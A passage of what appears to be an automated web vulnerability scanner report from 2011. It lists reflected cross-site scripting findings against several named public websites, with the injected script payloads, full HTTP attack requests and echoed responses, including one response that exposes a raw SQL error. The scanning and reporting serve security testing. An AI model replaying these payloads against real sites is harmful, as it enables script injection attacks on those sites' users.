ansactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=9aee2d8f1e244aa784bbc16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3; expires=Fri, 01 Apr 2011 17:29:25 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.150. http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/web/GE+Zero+Taxes

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae01e"-alert(1)-"a0d5d5414f7 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=18322850489c49eba441c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:28 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:28 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:28 GMT; path=/
Set-Cookie: wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301677048693; path=/
Set-Cookie: wsRecent=GE+Zero+Taxes,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:29 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 161046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=18322850489c49eba441c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7; expires=Fri, 01 Apr 2011 17:17:28 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.151. http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/web/Go+Daddy+CEO+Elephant

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cfb5"-alert(1)-"011a7e5ee80 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=2f1882418dbe4e03a009c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:17 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:17 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:17 GMT; path=/
Set-Cookie: wsTemp=bigIP+3775436042.20480.0000+cacheId+ms19:1301676994415; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:18 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 162067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=2f1882418dbe4e03a009c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80; expires=Fri, 01 Apr 2011 17:16:17 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.152. http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/web/MLB+Schedule

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f96a"-alert(1)-"0cf0cd42d43 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=f112a8794f3b4673a292c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:19 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:19 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:19 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301676996439; path=/
Set-Cookie: wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:20 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 145894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=f112a8794f3b4673a292c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43; expires=Fri, 01 Apr 2011 17:16:19 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.153. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31872<script>alert(1)</script>9528ad1c941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?31872<script>alert(1)</script>9528ad1c941=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1
Date: Fri, 01 Apr 2011 15:29:52 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1">http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1</a>

2.154. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e087"><script>alert(1)</script>f5d56d88177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9e087"><script>alert(1)</script>f5d56d88177=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1
Date: Fri, 01 Apr 2011 15:29:51 GMT
Content-Length: 197

The URL has moved to <a href="http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1">http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1</a>

2.155. http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mercantila.com
Path:   /website/shoppingcart/cartbroker.php

Issue detail

The value of the merc_uid cookie is copied into the HTML document as plain text between tags. The payload b3c36<img%20src%3da%20onerror%3dalert(1)>bd9912f2169 was submitted in the merc_uid cookie. This input was echoed as b3c36<img src=a onerror=alert(1)>bd9912f2169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /website/shoppingcart/cartbroker.php HTTP/1.1
Host: www.mercantila.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
Content-Length: 22
Origin: http://www.mercantila.com
X-Prototype-Version: 1.6.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mercServeBucket=merc-resources-gzip; mercServeCloud=dklnxffcpkmhm; PHPSESSID=1191364907574890868; merc_uid=6451364907577995808b3c36<img%20src%3da%20onerror%3dalert(1)>bd9912f2169; __utmz=1.1301677342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.940387525.1301677342.1301677342.1301677342.1; __utmc=1; __utmb=1.1.10.1301677342

Action=getCartCount&_=

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:02:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 997
Content-Type: text/html; charset=UTF-8

{"marr_data":"Error in query executionSELECT\r\n internal_code as INTERNAL_CODE, ref_product_id as REF_PRODUCT_ID, relation_type as RELATION_TYPE,\r\n quantity as
...[SNIP]...
s\r\n WHERE\r\n ref_cart_id = {\"marr_data\":\"Error in query executionSELECT internal_code, status FROM maya_cart WHERE status = 0 AND user_id = 6451364907577995808b3c36<img src=a onerror=alert(1)>bd9912f2169\",\"marr_request_param\":null,\"mint_status_code\":0,\"mstr_status_message\":null} \r\n ORDER BY\r\n internal_code","marr_request_param":null,"mint_status_code":0,"
...[SNIP]...

2.156. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 85bf8<script>alert(1)</script>c6dc492760e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico85bf8<script>alert(1)</script>c6dc492760e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e
Content-Type: text/html
Content-Length: 262

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e">http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e</a>
...[SNIP]...

2.157. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fff9"><script>alert(1)</script>496210cd2cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8fff9"><script>alert(1)</script>496210cd2cd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico8fff9"><script>alert(1)</script>496210cd2cd
Content-Type: text/html
Content-Length: 266

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico8fff9"><script>alert(1)</script>496210cd2cd">http://mrnumber.com/favicon.ic
...[SNIP]...

2.158. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593b7"><script>alert(1)</script>9834e7cd796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1
Content-Type: text/html
Content-Length: 272

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1">http://mrnumber.com/favicon
...[SNIP]...

2.159. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0fda<script>alert(1)</script>79f53615157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?e0fda<script>alert(1)</script>79f53615157=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1
Content-Type: text/html
Content-Length: 268

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1">http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1</a>
...[SNIP]...

2.160. http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionoutpost.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb49"><script>alert(1)</script>22543bfa152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icobcb49"><script>alert(1)</script>22543bfa152 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 269
Location: https://www.opinionoutpost.com:443/favicon.icobcb49"><script>alert(1)</script>22543bfa152

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/favicon.icobcb49"><script>alert(1)</script>22543bfa152">
...[SNIP]...

2.161. http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionoutpost.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d57c0"><script>alert(1)</script>ecafb33f606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 272
Location: https://www.opinionoutpost.com:443/favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1">
...[SNIP]...

2.162. http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rateyourmusic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933fb"><script>alert(1)</script>1ea6fc7b15e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rateyourmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Location: http://rateyourmusic.com/favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e
MIME-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:55 GMT
Server: AOLserver/4.5.0
Content-Type: text/html; charset=utf-8
Content-Length: 357
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Redirection</TITLE>
</HEAD>
<BODY>
<H2>Redirection</H2>
<A HREF="http://rateyourmusic.com/favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e">
...[SNIP]...

2.163. http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rateyourmusic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413d0"><script>alert(1)</script>c14e9c5ba4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rateyourmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Location: http://rateyourmusic.com/favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1&413d0"><script>alert(1)</script>c14e9c5ba4b=1
MIME-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:53 GMT
Server: AOLserver/4.5.0
Content-Type: text/html; charset=utf-8
Content-Length: 406
Connection: close

